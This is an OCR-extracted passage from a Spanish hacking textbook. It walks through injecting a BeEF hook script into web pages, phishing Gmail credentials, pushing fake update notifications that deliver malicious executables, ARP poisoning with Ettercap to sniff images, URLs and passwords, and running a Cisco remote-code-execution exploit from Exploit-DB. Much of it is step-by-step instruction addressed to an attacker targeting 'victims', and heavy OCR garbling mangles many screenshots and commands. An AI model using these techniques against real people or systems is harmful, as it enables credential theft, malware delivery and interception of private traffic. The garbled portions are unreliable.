Inject a launcher into a pr . Ex. psinject <listener> <pid/process_name> 
Executes PTH for a CredID t i Z 

Rename the agent. 

Read and execute a list of Empire commands from a file. 

Uses credentials/tokens to revert token privileges. 





Otra de las formas de comprometer un sistema tiene que ver con ejecutar 
código malicioso en una página web. El fundamento de esto, es que todos los 
navegadores corren páginas sobre un lenguaje, antes Java y Flash eran muy 
comunes, sin embargo, hoy en día el más común es JavaScript, que es de hecho es 
tan común, que prácticamente todas las páginas web corren algo de JavaScript, y 
todos los navegadores, tanto de Android, como Linux, como Windows, Macintosh y 
iOS, ejecutan JavaScript para cargar páginas web, así que eso convierte al lenguaje 
en uno de los vectores de ataque más versátiles que existen. 


Sin embargo, tiene limitantes, el primero es que, en la mayoría de los 
sistemas, los navegadores corren en una caja de arena, es decir, no es tan facil 
saltarse del acceso al navegador al sistema, aunque utilizando un poco de ingeniería 
social y algo de creatividad, es posible y el segundo, es que la víctima tiene que tener 
el código malicioso ejecutándose para que tengas acceso. 
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4.5.1 Malware en página web por medio de JS malicioso 


La herramienta que utilizaremos en esta ocasión se llama beef-xss, es una 


herramienta escrita en Python que esencialmente te dará dos cosas: 


1. Una liga a un código malicioso JavaScript, que se llama “hook” 


Este código malicioso deberás inyectarlo en una página web y enviarla 
a tu víctima. 


2. Un panel de control 


Esta herramienta ya viene preinstalada en Kali, así que, para abrirla, ejecútalo 
en su directorio /usr/share/beef-xss y escribe ./beef-xss dentro del directorio para 
ejecutarlo, una vez que lo ejecutes, te generara dos ligas con tu IP, una es del panel 


En este panel de control ejecutaras los ataques a tu víctima. 


de control y la otra es la url del código malicioso(hook). 


Las ligas que nos interesan son las que tienen la IP LAN o pública, no la que 


tiene la dirección local. 


1: 
Ded 
ES 
Je 
E 
a 
as 
Es 
ES 
E: 
1:4 
T 
i? 
E 
1:4 
154 
E 
de 
1:4 
1:2 





:~# cd /usr/share/beef-xss/ 


s# ls 


‘beef _cert.pem Gemfite 
beef key.pem cere extensions Gemfile. tock 


f-xss# ./beef 


Bind socket [imapeudoral] listening on [0.0.0.0:2000]. 


Browser Exploitation Framework (BeEF) @.4.7.0-alpha 
| Twit: @beefproject 

|} Site: http://beefproject.com 

] Blog: http://blog.beefproject.com 

| Wiki: https://github.com/beefproject/beef/wiki 
Project Creator: (@WadeAlcorn) 

BeEF is Loading. Wait a few seconds... 

12 extensions enabled. 

254 modules enabled. 

2 network interfaces were detected. 

running on network interface: 127.0.0.1 

i Hock URL: hAttp://127.0.6.1:3006/hock.js 

j UE URL:  http://127.0.6.1:3000/ui/panel 
running on network interface: 192.168.1.67 

| Hock URL: http://192.168.1.67/:3600/h00k.]s 

j UE URL: http: //192.168.1.67:36000/ui/panet 


RESTful API key: 0bc213592966242103a9160aa5c712b160194622 


HFIP Proxy: http://127.6.0.1:6789 
BeEF server started {press control+c to stop) 
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Así que lo primero que harás, es abrir un navegador, y escribir 
http://<IP>:3000/ui/panel, en los campos de autenticación el usuario y la contraseña 
son ambas beef. 











Este es tu panel de control, aquí es donde aparecerán los navegadores que 
estén comprometidos, ahorita no has utilizado tu “hook” (el código malicioso) en 
ninguna página, así que naturalmente debería de estar vacía la carpeta “online”. 








ly 
HPA Bees | Getting Started 

{J Online Browsers pce ee 
> (J Offline Browsers 


=eEF 


THE BROWSER EXPLOITATION FRAMEWORK PRI 





fficial website: http: roject.com/ 


Ahora, ve hacia tu directorio publico, es decir /var/www/html, y crearas un 
nuevo archivo index.html escribiendo gedit index.html, se abrirá un editor de texto, 
si hay algún código en este archivo, bórralo. 


:/# cd /var/wai/htmt 





# gedit index.html 


Ahora, escribirás en este archivo, el siguiente código. 
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<HTML> 
<head> 


<script type=“text/javascript® src="“http://192.168.1.67:3008/ho0k. js"></script> 
</head> 
</HTML>| 


Lo importante aqui, es la tercera linea, esta puede ser inyectada en cualquier 
pagina, pero ahorita dejamos la pagina en blanco por simplicidad, pero podrias haber 
usado cualquier pagina web. 


Ahora inicia el servicio Apache2 para hacer accesible tu directorio público. 


: # service apache2 start 


Listo, ahora solo falta que tu victima abra la pagina web, y en tu panel 
de control te aparecerá su navegador, para probarlo, puedes abrir la página web 
ingresando tu IP en cualquier navegador, algo así como http://<ip>, por ejemplo, en 
mi caso sería http://192.168.1.67 


Al abrir esa página, podrás ver en tu panel un nuevo navegador en línea. 





a 5 192.168.1.67 


? ME 102.168.183 
_ > (5) Offline Browsers 





4.5.1.1 CONTROLANDO EL SISTEMA COMPROMETIDO 


Una vez que tienes el sistema comprometido, deberás hacer clic en el sistema 
dentro de la carpeta, y te aparecerán módulos que puedes usar para atacar, pero 
primero tienes que entender el significado de estos. 


Controlar al navegador te permite hacer más cosas de lo que piensas, en 
cuanto a los módulos, lo que tienes que entender es que verde significa que el módulo 
funciona y es sigiloso, naranja es que funciona, pero no es sigiloso, blanco es que no 
se sabe si funciona, y rojo es que no funciona. 
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Hooked Browsers 


To interact with a hooked browser simply leit-click it, a new tab will appear. Each hocked browser tab has a} 
number of sub-tabs, described below: 


Main: Display information about the hooked browser after you've run some command modules. 
Logs: Displays recent log entries related to this particular hooked browser. 

Commands: This tab is where modules can be executed against the hooked browser. This is where 
most of the BeEF functionality resides. Most command modules consist of Javascript code that is 
executed against the selected Hooked Browser. Command modules are able to perform any actions 
that can be achieved through Javascript for example they may gather information about the Hooked 
Browser, manipulate the DOM or perform other activities such as exploiting vulnerabilities within the 
local network of the Hooked Browser. 


Each command module has a traffic light icon, which is used to indicate the following: 


d The command module works against the target and should be invisible to the user 
w The command module works against the target, but may be visible to the user 

L The command module is yet to be verified against this target 

o The command module does not work against this target 


XssRays: The XssRays tab allows the user to check if links, forms and URI path of the page (where 
the browser is hooked) is vulnerable to XSS. 

Rider: The Rider tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser. 
Each request sent by the Rider is recorded in the History panel. Click a history item to view the HTTP 
headers and HTML source of the HTTP response. 

Network: The Network tab allows you to interact with hosts on the local network(s) of the hooked 
browser. 





Una vez que hagas clic en el sistema comprometido, veras un menú con 
varias pestañas. 





J Category: Browser (6 Items} 

Browser Version: UNKNOWN 

Browser UA String: Mozilla/5.6 (Windows NT 10.0; Win64: x64) Apple WebKit($37.36 (KHTML, like Gecko) Chrome/67 0.3396.99 Safari/S537.36 
Browser Language: en 

Browser Platform: Win32 

Browser Plugins: Chrome PDF Plugin, Chrome PDF Viewer, Native Client 

Window Size: Width: 1920, Height 947 


3 Category: Browser Components (12 Items) 








fl Category: Host {8 Items) 


La pestaña “Details” te servirá para obtener información del dispositivo, 
pero lo que realmente nos interesa es la pestaña llamada “Commands”, donde están 
los módulos que podrás ejecutar contra el sistema. 
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| > EJ Browser (53) 

| > [3 Chrome Extensions (6) 
p {C} Debug (9) 

5 (Exploits (78) 


> (Host (22) 

> EJ IPEC (9) 

> (2) Metasploit (1) 

p £2) Mise (16) 

> £2) Network (19) 

> E) Persistence (5) 

> C} Phonegap (16) 

p £2) Social Engineering (21) 








Cada módulo tiene diferentes usos, desde obtener información adicional 
del sistema (como que antivirus tiene instalado), hasta reconocimiento en la red de 
la víctima para encontrar o atacar sistemas NAS o routers, son demasiados ataques y 
módulos para mencionarlos todos, así que te daré dos ejemplos con los cuales al saber 
la mecánica de su funcionamiento podrás ejecutar cualquiera de los demás módulos. 


4.5.1.1.1 Robo de credenciales 


Lo primero que veremos es como podrías utilizar el navegador infectado 
para redirigir a tu víctima a una página falsa donde podrás robarle sus credenciales. 


Para empezar, ve a la carpeta de “Social Engineering” y selecciona “Google 
Phishing” 


4 A Social Engineering (21) 
a Fake LasiPass 
a Lcamtuf Download 
Ø Clippy 


Q Fake Flash Update 


@ Fake Notification Bar (Chror_ 

Q Fake Notification Bar (Firefof 

@ Fake Notification Bar (E) | 
___ @ Google Phishing 
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Dentro de las opciones, en el XSS Hook esta el HTML que se utiliza para 
el ataque, en este caso tiene un modelo de Gmail, sin embargo, tú puedes darle la 
ruta de alguna página maliciosa que tu hayas creado, por ejemplo, con SEToolkit o 
Shellphish de las secciones anteriores. 


on: This plugin uses am image tag lo XSRF the logout button of Gmail. Continuously the user isiogged oat of Gmail (ep. E he ic logged in in another tab). Additional it wel show the Google favicon and a Gmail phishing page (although the 
URLS 











Al configurar la página que deseas utilizar, ejecuta el comando en el botón 
“execute” a la derecha inferior de la página. 


Decidon This phage umes ar maage tug lo XSRY the logout button of Grad. Contrast, the wer at logged ast el Goad ‘eg. £ he s fogged na anather tabi, Abdicar @ wil show De Googie fewer and a Gina pasweg page [eibar gb the 
(URL S NOT the Gat URL}. 


Me = 


f 





Al hacer esto, la página de la víctima se redirigirá de la página a la página 
falsa creada 
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Googie Mai 
A Googie approach to emat 
Google Ma's bo® oo the as the! eme? car be mme egie eficent and sse And maybe even fan 


Ate of Google Nat has 


Lots dt spacs 
De PELIS megas nó carta) of Bee toga 


Less sam . ae 
‘Heep vaweried MELIDE ovt Ji rove kebak. Stay gedis 


¡nba accens Camt acouns yae acorn? 


data: result=Username: librodehacker@gmail.com Password: contrasenahacker 





4.5.1.1.2 Descarga de malware 


Ahora, si lo que buscas es obtener acceso a su sistema, probablemente uno de 
los mejores caminos para ello sea engañarlo para descargar un ejecutable malicioso. 


Ahora, recuerda que este código malicioso lo puedes inyectar en cualquier 
página, así que, con esto, desde el punto de vista de la víctima, es el navegador el 
que le está diciendo lo siguiente, vamos a intentar convencer a la víctima de que 
descargue una “actualización” que tenga código malicioso. 


Para esto, de nuevo, ingresa a la carpeta de “Social Engineering”, pero ahora 
seleccionamos uno de los siguientes módulos, lo que hará es que mostraran una 
descarga o notificación a descarga para que tu víctima descargue un ejecutable. 
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© Fake Flash Update 


@ Fake Notification Bar (Chrome) 
@ Fake Notification Bar (Firefox) 
Q Fake Nolification Bar QE} 






Vamos a utilizar el ejemplo de Chrome, pero toma en cuenta que puedes 
modificar los archivos para que muestren lo que consideres adecuado. 


Ahora después de hacer clic en el módulo, podrás elegir una URL con una 
liga al ejecutable malicioso, una vez que configures eso, ejecuta el programa, de 
nuevo con el botón “execute” a la derecha inferior. 


Displays a fake notification bar at the top of the screen, similar to those presented in Chrome, F the user dicks the notification they wal be prompted to download the file specñed below. 


You can mount an exe m BaEF as per extensions/sodai_engineering/droppers/readme.bt. 


24 
‘nttp://0.0.0.0:3000/droppe.exe —— 
Netfcation ‘Additional plugins are required ta display ail the meda on this page. 





A tu víctima le aparecerá una notificación similar a esta, y al hacer clic se 
descarga el ejecutable al que tu hayas apuntado en la URL en la pantalla anterior, y, 
al ejecutarse, te daria un acceso remoto relativo al ejecutable que enviaste (claro, si 
envías un ejecutable por ejemplo de Metasploit, deberás tener el escuchador activado 
para establecer una conexión). 








£ > Œ 0 192.168.1.67 








install Missing Plugins. 


Recuerda tomar en cuenta la sección de detalles al inicio para seleccionar la 
barra de navegador y el tipo de malware a utilizar. 


4.5.1.1.3 Otros ataques 


Hay muchos más módulos para atacar en Beef, desde intentar obtener 
información de correos electrónicos, hasta secuestro de sesión, persistencia, o 
incluso obtención de información de ubicación entre otras cosas, especialmente si 
se está en un dispositivo móvil, así que recomiendo que veas todas las carpetas y 
módulos, todos se ejecutan de forma similar, con el botón “execute” y modificando 
las variables al seleccionar el módulo. 
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4&4 Mise (16) $ Confirm Close Tab 
> (IBM Hotes ($) ® Create Foreground iFrame 
@ BozeCrack $ Create Pop Under 
(y Create imisbie Mame 4 E Phonegap (16) 
5 Googie Search © Alert User 
de Frame Event Logger © Check Connection 


Ee © Detect PhoneGap 
jd Í 9 ¿y Geolocation 


e © Globalization Status 
@ UnBiocktl «> Keychain 
@ Frame Sniffer Y List Contacts 
> Cj Network (19) © List Files 
425 Persistence (5) @ List Plugins 
C Mandn-The-Browser © Persist resume 
ip Wotepress AGO Agmanesh C Persistence 
$ Continn Ciose Tab (> Prompt User 
© Start Recording Audio 
¿5 Stop Recording Audio 
(> Upload File 





4.5.1.2 COMPATIBILIDAD 


Este ataque funciona con todos los navegadores, ya sea en dispositivos 
móviles o en ordenadores, haciéndolo altamente versátil, así que no dudes en intentar 
los módulos en la carpeta “Phonegap” si obtienes acceso a un dispositivo móvil. 


4.6 ATAQUES WIFI 


4.6.1 Ataques de intercepción de información en la red (MITM) 


Si estamos conectados a una red en donde queremos espiar a los usuarios 
conectados a esta, podemos hacer lo que se llama un ataque de hombre en medio, o 
MITM, por sus siglas en inglés. 


Este ataque, aunque muy útil, es bastante sencillo, a pesar de que 
estadísticamente hablando (especialmente en México) muy pocas organizaciones 
han puesto mitigaciones contra esto, funciona poniéndonos entre dos sistemas que 
están en comunicación 
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Para que me entiendas mejor, imagina que tenemos tres personas en una 
habitación, Juan, Rodrigo y Alan, cada uno tiene un número en esa habitación, 
Juan tiene el número 1, Rodrigo el 2, y Alan el 3, y utilizan estos números para 
comunicarse, es decir, si Juan quiere mandar un “hola” a Rodrigo, no pone en el 
remitente “Rodrigo”, pone “2”, adicionalmente, Juan y Rodrigo solo mandan lo 
que comuniquen una vez a una sola persona. Juan y Rodrigo están teniendo una 
conversación privada, y Alan, quiere escucharla, entonces Alan empieza a mentir, le 
dice a Rodrigo que Alan es el 1, y a Juan que Alan es el 2, entonces Juan le manda 
el Hola a Alan, Alan le manda el hola a Rodrigo, y Rodrigo contesta, sin embargo, 
a través de esto, Alan está viendo todo lo que se comunica entre Juan y Rodrigo 
mientras que no esté encriptado. 


A pesar de que el ataque es muy efectivo, es relativamente fácil de identificar 
si sabes que estás buscando, piensa lógicamente, en el ejemplo anterior, si Juan y 
Rodrigo se dicen “hola” cada quien, ¿cuántos “holas” se mandaron? Dos, sin 
embargo, si Alan se pone en medio, y recibe el “hola” de Juan, y se lo manda a 
Rodrigo de parte de Juan, y Recibe el “hola” de Rodrigo y se lo manda a Juan de 
parte de este, cuantos “hola” ¿se mandaron? La respuesta es cuatro (el doble), esto se 
conoce como duplicación de paquetes, hablaré de esto en unas páginas más. 


E. 
User Web Application 


Now Connection 


Man in the Middie 





4.6.2 Protocolo ARP 


Antes que podamos realizar ataques, hay que entender un poco sobre 
el protocolo ARP (Address Resolution Protocol). Este es un protocolo utilizado 
principalmente en routers y switches que se utiliza para procesos relevantes a asociar 
una dirección física (MAC) con una dirección IP, y es bastante sencillo de entender, 
lidia con dos cosas principales, una pregunta, y una orden: 
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1. ¿La pregunta “Quién tiene esta IP? Dile a esta IP” 


Esta pregunta simplemente pregunta qué dirección MAC tiene asociada 
alguna dirección IP en particular, sirve para saber a qué máquina se 
enviara algún paquete, y también para saber si la dirección IP ya está 
asociada o está disponible, de hecho ya hemos utilizado de esta forma 
este protocolo, al realizar un escaneo nmap en la red, esta forma de saber 
quién está o no en la red tiene una ventaja importante: no le tenemos 
que preguntar directamente a un sistema por medio de un paquete TCP o 
ping, podemos simplemente preguntarle al router, además, los firewalls 
típicamente bloquean fácilmente los paquetes TCP que los ARP, ya que 
los ARP son utilizados mucho por el router. 


Este paquete usado de esta manera se ve similar a la imagen, nótese que 
está preguntando quien tiene una IP en particular, y ordenando que se le 
mande la respuesta a una IP en particular. 


ARP 42 who has 192.168.1.100? Tell 192.168.1.5 
ARP 60 who has 192.168.1.557 Tell 192.168.1.4 
ARP 42 who has 192.168.1.119? Tell 192.168.1.5 
ARP 42 who has 192.168.1.1007 Tell 192.168.1.5 
ARP 60 who has 192.168.1.5? Tell 192.168.1.4 
ARP 42 192.168.1.5 is at 50:46:5d:33:3f:8b 

ARP 60 who has 192.168.141.557 Tell 192.168.1.4 


. La orden “Esta IP está en esta dirección MAC” 


El otro uso del protocolo ARP es para dar órdenes, en este caso, asignando 
una IP a una dirección MAC, desde este momento, cualquier paquete que 
se envíe a esa dirección IP en particular, será recibida por el sistema a la 
cual está asignada esa IP. 


ARP 44 192.168.65.129 is at 00:0c:29:ad:ee:69 


4.6.3 Envenenamiento ARP 


Ahora que entendemos cómo funciona el protocolo ARP, podemos empezar 


a mandar paquetes de este protocolo “mintiéndole” a los sistemas en la red para 
interceptar sus paquetes. 


Para esto, abre la herramienta Ettercap, escribiendo en la terminal de Kali 


ettercap -G. 


:-# ettercap -G 
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Enseguida deberia abrirse la siguiente ventana. 





Esta es la herramienta que nos permitira realizar el ataque de hombre en 
medio, por medio de lo que se llama envenenamiento ARP, debido a que mandaremos 
paquetes ARP para “mentirle” a los sistemas sobre nuestra identidad en la red. 


Ahora haz clic en donde dice “Sniff” y “unified sniffing en el menú superior. 


Bridged sniffing... Ctrl+B f 





Set pcap filter... 


Posteriormente te aparecerá una pantalla en donde seleccionas tu interfaz 
de red, esta debe de ser la interfaz por la cual estas conectado a la red local que 
intentaras interceptar, en mi caso es la eth0, pero puede ser diferente para ti si estás 
utilizando alguna antena wifi externa, o no estés virtualizando. 





Ahora que ya está iniciado y cargado Ettercap en tu interfaz, lo primero que 
querrás es un listado de los sistemas conectados a la red, así que del menú superior 
selecciona “Hosts”, y “scan for hosts”. 
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Hosts View Mitm Filters 


Hosts list 


Enable IPv6 scan 
Scan for hosts 
Load from file... 
Save to file... 





Esto escaneara a las maquinas existentes en tu red mandando paquetes ARP 
con la función 1 que menciona, pero no muestra el listado, para esto, deberás hacer 
clic en el mismo botón del menú superior, pero ahora presionar “Hosts list”. 


Enable IPv6 scan 
Scan for hosts 
Load from fite... 
Save to file... 





Ahora te debería de aparecer un listado de todos los sistemas conectados en 
tu red, mostrando su dirección IP, y su dirección MAC, así como su descripción si 
es que la tiene. 


Censure los datos de los equipos por seguridad. 





ettercap 9.8.2 
Start Targets Hosts View Mim Filters Logging Plugins info 
eae | — 
IP Address = Se _MAC Address Description 
192.168.165 8: 


192. 168.1.70 





78.Local : 


192.168.1.71 
192.168.176 
192.168.179 
192.168.1.83 
192.168.1.115 
192.168.1.132 





fina bh o w WB © 
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Ahora, tendras que seleccionar tus victimas, es decir, en medio de qué 
sistema o sistemas te quieres poner, en este caso no necesariamente tiene que ser 
uno, pueden ser muchos (pero dependiendo de tu sistema y tu antena, podrías toparte 
con cuellos de botella). 


En este caso queremos interceptar la comunicación de una máquina, por 
ejemplo, la /92.168.1.83, con el internet, que es a través del router, pero ¿que si no 
sabemos la dirección del router? 


Puedes encontrar esta información simplemente escribiendo en otra terminal 
route -n. 


i~# route -n 
Kernel IP routing table 
Destination Gateway Ag Flags Metric Ref Use Iface 





0.6.0.6 192.168.1.254 .0.0.6 UG 160 G 6 etho 
192.168.1.0 0.0.0.0 E .235.0 U 8 6 etho 


Obtuvimos que la dirección del router es la 192.168.1.254, entonces 
agregaremos la víctima, que es la que tienen la IP con terminación 83, como “target 
1”, y la ip del router, con terminación 254, en “target 2”. 








Delete Host 














Listo, podemos confirmar nuestros objetivos, o hacer cambios, en la sección 


“targets”. 








Select target(s) Shafts Chie T ' 


Cti+P E 





Protocol... 
Reverse matching 


Wipe targets 


Target 2 
| 192.168.1254 
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Ahora, para iniciar el ataque, seleccionaremos del menú superior la opción 
MITM, seguido de ARP Poisoning. 


Mitm Filters Logging Plá 


O ARP poisoning... 
ICMP redirect... 
Port stealing... 











DHCP spoofing... 
NDP poisoning... 


Stop mitm attack(s) 


Y selecciona la opción “sniff remote connections”, y luego presiona ok. 


MITM Attack: ARP Poisoning €) | 


Optional parameters 








En laterminal te confirmara los objetivos a quienes les harásel envenenamiento 
ARP. 


ARP poisoning victims: 


GROUP 1: 192.168.183 - 


GROUP 2: 192.168.1.254 





Y listo, ya solo presiona Start y “Start sniffing” y ya estarás realizando 
envenenamiento ARP, esto causará que todos los paquetes que manda y recibe tu 
objetivo, pasen por tu interfaz, permitiéndote espiarlo. 












Start Targets Hosts View Mif 


Start sniffing Shit Cri ew 


Stop sniffing Shift+Ceis£ ] 
Exit Cel+O q 
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4.6.4 Interpretando paquetes en WireShark 


Como te habras imaginado, mientras que los paquetes pasen por nuestra 
interfaz, WireShark puede ser utilizado para analizar dichos paquetes, asi que basta 
abrir WireShark como se mencionó en la sección de WireShark, y notaras que ahora 
estas recibiendo paquetes con destino y fuente del sistema a quien estas haciendo el 
ataque. 


Aqui podemos ver exactamente que paso con este ataque en cuestión de 
paquetes, nota como WireShark está dando un aviso de que existe un uso duplicado 
de una IP, esto es porque esencialmente le estas mintiendo al router sobre tu identidad 
en la red. 








prete E ie 
42 192.168.1.83 is at 2d ¡(duplicate use of 192.168.1.254 detected! 


60 Who has 192.168.1.83? Tell 192.168.1.254 {duplicate use of 192.168.1.254 detected!) 





Todo lo demas de WireShark funciona esencialmente igual, solo que ahora 
tendrás acceso a paquetes fuera de tu sistema, asi que, si alguien entra a alguna pagina 
web, transmite credenciales sin encriptar, o algo similar, podrás verlo en WireShark. 


4.6.5 Interceptando Imágenes 


Ahora, aunque WireShark te muestra todo, no siempre es práctico estar 
buscando los paquetes de cosas específicas como imágenes, así que hay una 
herramienta llamada driftnet, que filtra las imágenes y te las muestra directamente, 
existen herramientas similares para filtrar otros tipos de paquetes, lo cual podrían 
hacer tu trabajo más fácil. 


Para ejecutar la herramienta, escribe en la terminal de Kali driftnet -i 
<interfaz>, en este caso mi interfaz es eth0, así que el comando para mi seria 
driftnet -i eth0. 


Al ejecutar el comando, se abrirá una ventana donde se mostrarán las 
imágenes interceptadas. 













:-++ driftnet -i ethó 





driftnet 


Aquí solo toca observar esa pantalla para ver las imágenes que el objetivo 
está cargando, esto puede ser útil para reconocimiento adicional o potencialmente 
encontrar información confidencial. 
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4.6.6 Interceptando URLs 


También puedes filtrar los paquetes por HTTP, y, a pesar de que esto es 
bastante sencillo hacerlo en WireShark, existe una herramienta para hacerlo un poco 
más rápido, llamado urlsnarf, para utilizarla, deberás ejecutar el comando urlsnarf 
-i <interfaz> en tu terminal de Kali, en mi caso, ya que mi interfaz es eth0, ejecutar 
el comando urlsnarf -i eth0. 


Una vez ejecutado el comando, en la terminal se te mostrarán los paquetes 
HTTP que muestran direcciones accedidas y por qué método HTTP. 


:-# urisnarf -i etho 
urlsnarf: Listening on eth@ [tcp port 80 or port 8080 or port 3128] 
192.168.1.83 - - [11/Aug/2018:03:54:35 -0500] "GET http://192.168.1.254:1990/1d0a5510-cOfc-4€ 
e9-aad7-8522c76742f9/WFADevice.xml HTTP/1.1" - - "-" "Microsoft-Wi /10.0 UPnP/1.0" 
192.168.1.83 - - [11/Aug/2018:03:54:35 -0500] "GET http://192.168.1.254:49152/gatedesc.xml H 
TP/1.1" - - "-" "Microsoft-Windows/10.0 UPnP/1.0" 
192.168.1.83 - - [11/Aug/2018:03:54:35 -0500] "GET http://192.168.1.79:8060/ HTTP/1.1" - - "- 
” "Microsoft-Windows/10.0 UPnP/1.0" 
192.168.1.83 - - [11/Aug/2018:03:54:43 -0508] "GET http://whitesuithacking.mx/ HTTP/1.1" - - 
"_" "Mozilia/5.0 (Windows NT 10.0; Win64; x64) AppieWebKit/537.36 (KHTML, Like Gecko) Chrome/ 
68.0.3446.166 Safari/537.36" 
192.168.1.83 - - [11/Aug/2018:03:54:45 -0500] "GET http://192.168.1.254:49152/gatedesc.xml H 
TP/1.1" - - “-" "Microsoft-Windows/1@.6 UPnP/1.6" 
192.168.1.83 - [11/Aug/2018:03:54:45 -0500] "GET http://192.168.1.254:1990/1d0a5510-cOfc- 46 
e9-aad7 -8522c 2f9/WFADevice.xml HTTP/1.1" - - "-" crosoft-Windows/10.6 UPnP/1.0" 


" "Microsoft-Windows/16.0 UP 

192.168.1.83 - - [11/Aug/201 

TP/1.1" - - "-" “Microsoft s/10.0 UPnP/1.0" 

192.168.1.83 - - [11/Aug/201: :54:55 -0500] "GET http://192.168.1.254:1996/1d0a5510-cOfc-4G 
e9-aad?-8522076742f9/WFADevice t HTTP/1.1" - - "-" "Microsoft-Windows/10.0 UPnP/1.0" 
192.168.1.83 - 54:55 -0500] "GET http://192.168.1.79:8068/ HTTP/1.1" - 

" "Microsoft-Windows/10.6 UPnP/1.0" 
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4.6.7 Interceptando credenciales no encriptadas 


Ahora, si alguien transmite credenciales no encriptadas en la red mientras 
tu estas interceptando, podrias buscar el método en WireShark para sacar las 
credenciales, sin embargo, Ettercap ya tiene esa función integrada, así que, si tu 
víctima entra a una página sin SSL, e ingresa credenciales, aparecerá en la consola 
de Ettercap. 








i —- 10:80 -> USER: usauriohackeado PASS: contrasenahackeada INFO: http:/ mad 
: user_id=usauriohackeado&password=contrasenahackeadagdogin=Login&action=togin&new_loc= 








Un exploit, a diferencia de un payload, es una falla por la cual se puede 
comprometer la seguridad de la información, podríamos decir que una vulnerabilidad 
es lo que permite que exista un exploit, por eso la gran mayoría de los exploits están 
basados en un CVE, y podrás encontrar exploits de CVEs muy seguido, aunque no 
todas las vulnerabilidades tienen exploits disponibles. 


Ahora, hay varias formas de utilizar exploits, ya que hay una enorme 
cantidad de estos, desde ataques para sistemas Linux o Windows, hasta para routers 
o televisiones, y cada uno tiene una forma y requisitos para utilizarse diferente, 
así que nos enfocaremos principalmente en como poder entender un exploit para 
poder utilizar cualquiera que queramos, aunque no conozcamos esa tecnología en 
particular. 


También existen lo que llamamos zero-day, estos son exploits que no han 
sido publicados, por lo tanto, los fabricantes no han diseñado contramedidas contra 
estos, y son algunos de los ataques más peligrosos que existen, pero también de los 
más difíciles de conseguir, un zero day hoy en día para un sistema conocido podría 
venderse en miles o cientos de miles de dólares dependiendo de qué tan poderoso 
sea. 


4.7.1 Base de datos de Exploits 


Exploitdb, como su nombre lo dice, es una página web con una base de 
datos de exploits para diferentes tipos de sistemas, como esta hay varias fuentes, 
pero es una de las más grandes, para acceder a esta base de datos basta con ingresar 
a https: //www.exploit-db.com/ . 
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EXPLOIT > 
DATABASE 


Para encontrar un exploit aquí, basta con buscar en la barra del buscador el 
nombre del exploit, o el CVE que está explotando, por ejemplo, vamos a imaginar 
que en una auditoría el escáner te mostró que el switch que utilizan es vulnerable al 
CVE-2017-3881, entonces buscarías en la sección de búsqueda el CVE. 


Search the Exploit Database 


Search the Database for Exploits Papers. and Shelicode. You can even search hy CVE and OSYDB identifiers. > 





CUE-2017-3881 A tmacta robot 


Te mostrará los exploits que existan para ese CVE, y tendrás que hacer clic 
en uno, es común que exista más de uno para un solo CVE. 


Dare» A v Tite Platform 
2017-08-12 | - 2 Cisco Catalys SISET - ROCEM' Remote Code Execution 


2017-04-42 3 -  ciscocaraly a SSISEY -'ROCEM Remote Code Execution 





Al hacer clic nos mostrará el nombre del exploit, y alguna información, y 
en la parte inferior, el código, en este caso, podemos ver que en plataforma dice 
Hardware, significa que no se ejecuta en ninguna herramienta en específico como 
Metasploit. 


Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code | 
Execution 


EDB-ID: 42122 Author: Artem Kondratenko Published: 20% 7-02-32 
CWE: CVE-2017-3381 Type: Remote Platform: Hardware 


Aliases: N/A Advisory/Source: Link Tags: Remote 


E-D8 Verified @ Exploit: Y Download / View Rew Vulnerable App: N/A 
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#1 /usr/bin/python 
23 # Author: 
3 # Artem Kondratenko (Sartkond) 


po 


5 import socket 
import sys 
from time import sleep 


set_credless = True 


if len(sys.argy) < 3: 
print sys.argv[@] + * [host] --set/--unset’ 


f sys.exit() 


¿UN da O te OO AG OH 


Debido a que no se ejecuta el código en Metasploit, descargamos el código 
en el botón “download”, a este punto notamos que es un script escrito en Python, 
lo que significa que podremos ejecutarlo en este lenguaje. Hay muchos tipos de 
exploits, algunos podrán ser escritos en Python, JS, Java, Ruby, etc, debes poder 
ejecutar y utilizar cualquier exploit que tengas que utilizar, es sencillo, simplemente 
busca la terminación, y como ejecutarlo. 








42122 py Properties 
Basic Es a. 7 


| a] Name: 42122.py l 





Type: Python script (text/x-python} 
Size: 2.8 kB (2,841 bytes} 


Parent Fotder: /root/Desktop 


Accessed: Mon 13 Aug 2018 03:00:30 AM CDT 
Modified: Mon 13 Aug 2018 02:59:47 AM CDT 





Para ejecutar el script, simplemente escribe el comando para abrir scripts 
en Python, y el nombre del archivo, que seria python 42122.py -h, el “-h” es para 
ver las opciones, una buena parte de los exploits tienen integrado comandos de 
ayuda como “-h” o “-help”, asi que úsalos al no saber cómo utilizar un script (de lo 
contrario, lee el código). 


z # python 42122.py -h 


[host] --set/--unset 





Y listo, a este punto podríamos utilizar este exploit, que nos permitirá 
resetear los dispositivos vulnerables, por ejemplo, si mi objetivo estuviera en la IP 
192.168.1.1, el comando seria python 42122.py 192.168.1.1 —set 


thon 42122.py 192.168.1.1 --set 
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El punto aquí es que sepas que puedes utilizar cualquier exploit sacado 
de alguna base de datos como exploit-db, y no depender de herramientas como 
Metasploit para realizar ataques a sistemas. 


4.7.2 Inyección SQL 


La inyección SQL es una de las vulnerabilidades mencionadas en el OWASP 
top 10 desde hace más de 10 años, y es porque sigue afectando a miles de páginas 
web y bases de datos. 


Esta vulnerabilidad se utiliza para atacar la seguridad de sistemas con 
información, como las bases de datos, en estas bases de datos, se inyectan comandos 
SQL en campos de entrada de datos de forma que se ejecuta código sin autorización 
en el servidor. 


La inyección SQL afecta a tantos sistemas debido a que puede estar 
presente en casi cualquier lenguaje de programación, sin embargo, depende de una 
vulnerabilidad en el software, que puede ser que la entrada no está correctamente 
filtrada, o cualquier falla en la que se permita ejecutar comandos de una entrada en 
vez de considerarlos un ‘string’ sin permisos de ejecución. 


Por medio de esta vulnerabilidad se puede comprometer la integración de la 
información, ya que es posible acceder a información confidencial, y la disponibilidad 
e integridad, ya que es posible eliminar o cambiar la información, siendo una de las 
vulnerabilidades críticas más comunes de hoy en día. 


4.7.2.1 LABORATORIO DE PRÁCTICA Y CÓMO FUNCIONA SQLI 


Para realizar inyección SQL existen varias herramientas, pero pocas son tan 
buenas como SQLMap, para practicar esto, inyectaremos una página para prácticas 
que pueden encontrar en el sistema de OWASP-BWAP, para esto, inicien la máquina 
de OWASP-BWAP en su VMware o VirtualBox. 


(E OWASP Broken Web Apps VM v1.2 
